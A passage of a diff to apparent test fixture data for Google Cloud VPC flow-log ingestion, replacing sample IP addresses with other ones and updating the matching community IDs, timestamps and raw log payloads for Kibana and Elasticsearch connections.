-1375,10 +1375,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1392,7 +1392,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:e5cZeUPf9fWSqRY+SUSG302spGE=", + "community_id": "1:MxkJSlVhiCttfItp2SdfNMtLgEY=", "bytes": 13643, "name": "default", "transport": "tcp", @@ -1415,7 +1415,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -1451,8 +1451,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868437700Z", - "original": "{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391226900Z", + "original": "{\"insertId\":\"ut8lbrffooxyo\",\"jsonPayload\":{\"bytes_sent\":\"13643\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33970},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"99\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466657665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466657665Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -1472,17 +1472,17 @@ "ip": "10.49.136.133" }, "source": { - "address": "203.0.113.93", + "address": "67.43.156.13", "port": 9243, "bytes": 34509840, "packets": 8690, - "ip": "203.0.113.93" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Y9ynsBV313F1oc4DGZ0sYBcNoQA=", + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", "bytes": 34509840, "transport": "tcp", "type": "ipv4", @@ -1496,7 +1496,7 @@ }, "related": { "ip": [ - "203.0.113.93", + "67.43.156.13", "10.49.136.133" ] }, @@ -1521,8 +1521,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868441Z", - "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"203.0.113.93\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391232500Z", + "original": "{\"insertId\":\"ut8lbrffooxzc\",\"jsonPayload\":{\"bytes_sent\":\"34509840\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":46864,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:29.432367659Z\",\"packets_sent\":\"8690\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"start_time\":\"2019-06-14T03:40:17.343890802Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.343890802Z", "end": "2019-06-14T03:49:29.432367659Z", @@ -1549,17 +1549,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34836, "bytes": 1467, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:LQLr5Clnxf10OYhT92IBepyH/y0=", + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -1573,7 +1573,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -1598,8 +1598,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868444300Z", - "original": "{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391238100Z", + "original": "{\"insertId\":\"ut8lbrffooxz7\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34836},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", "end": "2019-06-14T03:48:39.076420731Z", @@ -1620,10 +1620,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -1637,7 +1637,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9htI9XhB+GFEM8rmtAiskiLz++Y=", + "community_id": "1:inP0peZrjQuMumAL2dZH5u0O354=", "bytes": 63671, "name": "default", "transport": "tcp", @@ -1660,7 +1660,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -1696,8 +1696,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868447600Z", - "original": "{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391243800Z", + "original": "{\"insertId\":\"ut8lbrffooxyu\",\"jsonPayload\":{\"bytes_sent\":\"63671\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33554},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"367\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500506974Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500506974Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -1720,9 +1720,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65320, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -1736,7 +1736,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aNFZC/smfQa37MQsZfMmP5cD6PE=", + "community_id": "1:35LvCkME5lZSqhiM4O+MxjttWtA=", "bytes": 51075, "transport": "tcp", "type": "ipv4", @@ -1751,7 +1751,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -1775,8 +1775,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868450800Z", - "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391249300Z", + "original": "{\"insertId\":\"ut8lbrffooxyv\",\"jsonPayload\":{\"bytes_sent\":\"51075\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65320,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220714119Z\",\"packets_sent\":\"608\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.560917237Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.560917237Z", "end": "2019-06-14T03:49:56.220714119Z", @@ -1797,10 +1797,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33562, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -1814,7 +1814,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:oDThWwe999DZ+ToL+uXcjZRio7c=", + "community_id": "1:zUvAQSLCTNOIkUn3aNG0HbYxPv8=", "bytes": 197840, "name": "default", "transport": "tcp", @@ -1837,7 +1837,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -1873,8 +1873,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868453900Z", - "original": "{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391254800Z", + "original": "{\"insertId\":\"ut8lbrffooxz0\",\"jsonPayload\":{\"bytes_sent\":\"197840\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33562,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393910944Z\",\"packets_sent\":\"258\",\"reporter\":\"SRC\",\"rtt_msec\":\"192\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074897435Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074897435Z", "end": "2019-06-14T03:49:56.393910944Z", @@ -1889,8 +1889,8 @@ }, "destination": { "port": 9243, - "address": "203.0.113.93", - "ip": "203.0.113.93" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "address": "10.49.136.133", @@ -1904,7 +1904,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Y9ynsBV313F1oc4DGZ0sYBcNoQA=", + "community_id": "1:j0PdUfLhQ/r+kYCVQX20c/nfCSc=", "bytes": 173805495, "transport": "tcp", "type": "ipv4", @@ -1919,7 +1919,7 @@ "related": { "ip": [ "10.49.136.133", - "203.0.113.93" + "67.43.156.13" ] }, "gcp": { @@ -1943,8 +1943,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868471400Z", - "original": "{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"203.0.113.93\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391260300Z", + "original": "{\"insertId\":\"ut8lbrffooxys\",\"jsonPayload\":{\"bytes_sent\":\"173805495\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":46864},\"end_time\":\"2019-06-14T03:49:58.716492806Z\",\"packets_sent\":\"44438\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.306085222Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.306085222Z", "end": "2019-06-14T03:49:58.716492806Z", @@ -1971,17 +1971,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 33478, "bytes": 1468, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Eav+HA4T0zQk7MDzMdHH6Hhsx2A=", + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", "bytes": 1468, "transport": "tcp", "type": "ipv4", @@ -1995,7 +1995,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -2020,8 +2020,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868477300Z", - "original": "{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391265900Z", + "original": "{\"insertId\":\"ut8lbrffooxyx\",\"jsonPayload\":{\"bytes_sent\":\"1468\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33478},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:45:37.186193305Z", "end": "2019-06-14T03:45:37.301953198Z", @@ -2042,10 +2042,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33548, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2059,7 +2059,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:komMvAI/1VsC7c9d9LuzM29I9NY=", + "community_id": "1:+S3/6PF+UXU7wlJD68HIrz0Mo6c=", "bytes": 159704, "name": "default", "transport": "tcp", @@ -2082,7 +2082,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -2118,8 +2118,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868481500Z", - "original": "{\"insertId\":\"ut8lbrffooxz4\",\"jsonPayload\":{\"bytes_sent\":\"159704\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33548,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393651211Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2